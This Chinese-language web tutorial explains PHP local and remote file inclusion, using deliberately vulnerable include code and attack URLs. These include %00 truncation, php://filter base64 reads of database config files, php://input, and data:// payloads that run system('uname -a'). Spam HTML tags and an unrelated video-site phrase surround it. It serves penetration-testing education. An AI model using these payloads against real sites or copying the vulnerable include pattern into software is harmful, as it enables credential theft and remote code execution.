<ruby id="bdb3f"></ruby>

    <p id="bdb3f"><cite id="bdb3f"></cite></p>

      <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
        <p id="bdb3f"><cite id="bdb3f"></cite></p>

          <pre id="bdb3f"></pre>
          <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

          <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
          <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

          <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                <ruby id="bdb3f"></ruby>

                企業??AI智能體構建引擎,智能編排和調試,一鍵部署,支持知識庫和私有化部署方案 廣告
                常見文件包含函數 include(),require(),include\_once(),require\_once()函數 **本地包含** ``` 訪問 http://localhost/test/ddd.php?file=1.txt //ddd.php if (isset($_GET['file'])) { $file=$_GET['file']; include $file; } //1.txt <?php phpinfo(); ?> ``` 或者 ``` //如果是 include $file.".php";需要%00截斷 訪問 http://localhost/test/ddd.php?file=1.txt%00 //ddd.php if (isset($_GET['file'])) { $file=$_GET['file']; include $file.".php"; } //1.txt <?php phpinfo(); ?> ``` **遠程包含:** 需要開啟的擴展:allow_url_fopen 和 allow_url_include 為 On 且版本>=5.2.0 [allow_url_fopen='1'](https://www.php.net/manual/en/filesystem.configuration.php#ini.allow-url-fopen):該選項為on便是激活了 URL 形式的 fopen 封裝協議使得可以訪問 URL 對象文件等。 [allow_url_include='0'](https://www.php.net/manual/en/filesystem.configuration.php#ini.allow-url-include):該選項為on便是允許 包含URL 對象文件等 ' 5.2新增7.4移除 ``` //后面加個問號 訪問 http://localhost/test/ddd.php?file=www.elseweb.com/1.txt? ``` ## **偽協議:** **1. php://filter/read=convert.base64-encode/resource=** 在 allow_url_include = On 且 PHP >= 5.2.0 假設如下一個場景 (1)?http://vulnerable/fileincl/example1.php?page=intro.php(該php文件包含LFI漏洞) (2)?但是你沒有地方可以upload你的webshell代碼 (3)?LFI只能讀取到非php文件的源碼(因為無法解析執行?只能被爆菊花) (4)?如果你能讀取到config.php之類文件?或許可以直接拿到數據庫賬號遠程入侵進去 【現在的問題是】?LFI如何讀取到php文件的源碼? 于是給大家做個演示?如果我正常用LFI去讀**/sqli/db.php**文件?是無法讀取它的源碼?它會被當做php文件被執行 ``` http://vulnerable/fileincl/example1.php?page=../sqli/db.php ``` ![](https://img.kancloud.cn/ab/fa/abfaa69f0aa4cb6f80f3371f858544f8_636x181.png) 但是如果我用base64轉義?就能把指定php文件的源碼以**base64**方式編碼并被顯示出來 ``` http://vulnerable/fileincl/example1.php?page=php://filter/read=convert.base64-encode/resource=../sqli/db.php ``` ![](https://img.kancloud.cn/4a/9d/4a9dba4cef3ab39f51b1bf56e91c1ba3_930x197.png) **/sqli/db.php**源碼**base64**編碼后的內容顯示如下 PD9waHAgCiAgJGxuayA9IG15c3FsX2Nvbm5lY3QoImxvY2FsaG9zdCIsICJwZW50ZXN0ZXJsYWIiLCAicGVudGVzdGVybGFiIik7CiAgJGRiID0gbXlzcWxfc2VsZWN0X2RiKCdleGVyY2lzZXMnLCAkbG5rKTsKPz4K 然后我們再去進行**base64**解碼?解碼后**/sqli/db.php**文件的源碼一覽無遺 ![](https://img.kancloud.cn/b0/c5/b0c58727665447a33fe7b7e6fb1f1a48_578x374.png) **2. php://input** 我們需要用到一個HackBar的插件,新版的要收費,我們可以選擇[舊版本](https://pan.baidu.com/s/1gz4IyxjuITk_OkWwnDw30Q)的鏈接: 安裝好以后F12 調試臺選擇操作 ![](https://img.kancloud.cn/b9/47/b947706e5d89213f557391e3c0413ff5_546x191.png) 點擊Execute運行 **再換幾種姿勢繼續??**data:**?的方式** ``` http://vulnerable/fileincl/example1.php?page=data://text/plain;base64,PD9waHBpbmZvKCk7Lyo= http://vulnerable/fileincl/example1.php?page=data:;base64,PD9waHBpbmZvKCk7Lyo= http://vulnerable/fileincl/example1.php?page=data:text/plain,<?php system("uname -a");?> ``` 關于xml漏洞參看[XXE漏洞](https://www.cnblogs.com/zhaijiahui/p/9147595.html)
                  <ruby id="bdb3f"></ruby>

                  <p id="bdb3f"><cite id="bdb3f"></cite></p>

                    <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
                      <p id="bdb3f"><cite id="bdb3f"></cite></p>

                        <pre id="bdb3f"></pre>
                        <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

                        <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
                        <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

                        <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                              <ruby id="bdb3f"></ruby>

                              哎呀哎呀视频在线观看